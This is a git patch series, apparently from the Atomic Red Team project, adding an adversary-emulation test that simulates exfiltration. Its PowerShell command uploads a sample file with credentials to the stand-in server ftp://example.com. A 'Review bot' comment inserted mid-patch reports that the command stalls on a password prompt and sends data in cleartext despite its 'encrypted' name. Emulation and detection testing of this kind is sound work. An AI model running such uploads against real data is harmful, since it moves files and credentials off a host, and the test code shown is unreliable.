From 70663f60c25a1b3c4b05f1f705283efa5d1a8ee8 Mon Sep 17 00:00:00 2001
From: sai prashanth pulisetti <40313110+prashanthpulisetti@users.noreply.github.com>
Date: Thu, 18 Jan 2024 13:13:16 +0530
Subject: [PATCH 1/4] Update T1020.yaml

Atomic Test #2 - Exfiltration via Encrypted FTP Simulates encrypted file transfer to an FTP server, representing stealthy data exfiltration methods.

---
 atomics/T1020/T1020.yaml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 8b6959ae66..526561cfd4 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -29,3 +29,38 @@ atomic_tests:
 $fileName = "#{file}"
 Remove-Item -Path $fileName -ErrorAction Ignore
 name: powershell
+
+- name: Exfiltration via Encrypted FTP
+ auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
+ description: Simulates encrypted file transfer to an FTP server.
+ supported_platforms:
+ - windows
+ input_arguments:
+ sampleFile:
+ description: Path of the sample file to exfiltrate.
+ type: String
+ default: C:\temp\T1020__FTP_sample.txt
+ ftpServer:
+ description: FTP server URL.
+ type: Url
+ default: ftp://example.com
+ credentials:
+ description: FTP server credentials.
+ type: String
+ default: [user:password]
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $sampleData = "Sample data for exfiltration test"
+ Set-Content -Path "#{sampleFile}" -Value $sampleData
+ $ftpUrl = "#{ftpServer}"
+ $creds = Get-Credential -Credential "#{credentials}"
+ Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
+ cleanup_command: |
+ Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
+ dependencies: []
+ prereq_command: ""
+ get_prereq_command: ""
+ notes:
+ - For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
From fa2da1484acbd4697cd61a1a3b24b79b769fcac4 Mon Sep 17 00:00:00 2001
From: sai prashanth pulisetti <40313110+prashanthpulisetti@users.noreply.github.com>
Date: Thu, 18 Jan 2024 13:18:23 +0530
Subject: [PATCH 2/4] Update T1020.yaml

updated notes

---
 atomics/T1020/T1020.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 526561cfd4..4f64c575ca 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
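Review bot: `$creds = Get-Credential -Credential "#{credentials}"` in the new executor block will stall the test, because when `-Credential` receives a plain string Get-Credential treats it as the user name and opens an interactive password prompt, so the `[user:password]` default never supplies a password and the command does not complete under an unattended runner. A non-interactive form takes the user and password as two separate input arguments and builds the credential with `$secure = ConvertTo-SecureString "#{ftpPassword}" -AsPlainText -Force` followed by `$creds = New-Object System.Management.Automation.PSCredential("#{ftpUser}", $secure)` (argument names are proposed, not present in the hunk). The test name and description say "encrypted", yet the `ftpServer` default is plain `ftp://example.com` and Invoke-WebRequest exposes no FTPS/TLS switch, so as written the credentials and file contents would leave the host in cleartext; that should either be stated in the description, since it changes what a detection for this atomic should look for, or the test should be renamed. I am also not certain that `Invoke-WebRequest -Method Put` performs an FTP upload at all, so the command is worth confirming against a throwaway server before merge. The same "encrypted" wording is carried unchanged into the description in the first hunk of the final patch.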
@@ -63,4 +63,5 @@ atomic_tests:
 prereq_command: ""
 get_prereq_command: ""
 notes:
- - For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
+ - "For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only."
+
From 630ecd72e116944e86b16e664ef793253c48cc14 Mon Sep 17 00:00:00 2001
From: sai prashanth pulisetti <40313110+prashanthpulisetti@users.noreply.github.com>
Date: Thu, 18 Jan 2024 13:20:38 +0530
Subject: [PATCH 3/4] Update T1020.yaml

updated line 50

---
 atomics/T1020/T1020.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 4f64c575ca..2bdff77196 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -47,7 +47,7 @@ atomic_tests:
 credentials:
 description: FTP server credentials.
 type: String
- default: [user:password]
+ default: "[user:password]"
 executor:
 name: powershell
 elevation_required: false
From 8992934c11e2e38546ec4fd209c382845a5376bf Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Thu, 18 Jan 2024 15:51:38 -0600
Subject: [PATCH 4/4] move notes to description, remove empty tags

---
 atomics/T1020/T1020.yaml | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 2bdff77196..82c85fc152 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -32,7 +32,7 @@ atomic_tests:

 - name: Exfiltration via Encrypted FTP
 auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
- description: Simulates encrypted file transfer to an FTP server.
+ description: Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
 supported_platforms:
 - windows
 input_arguments:
@@ -59,9 +59,3 @@ atomic_tests:
 Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
 cleanup_command: |
 Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
- dependencies: []
- prereq_command: ""
- get_prereq_command: ""
- notes:
- - "For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only."
-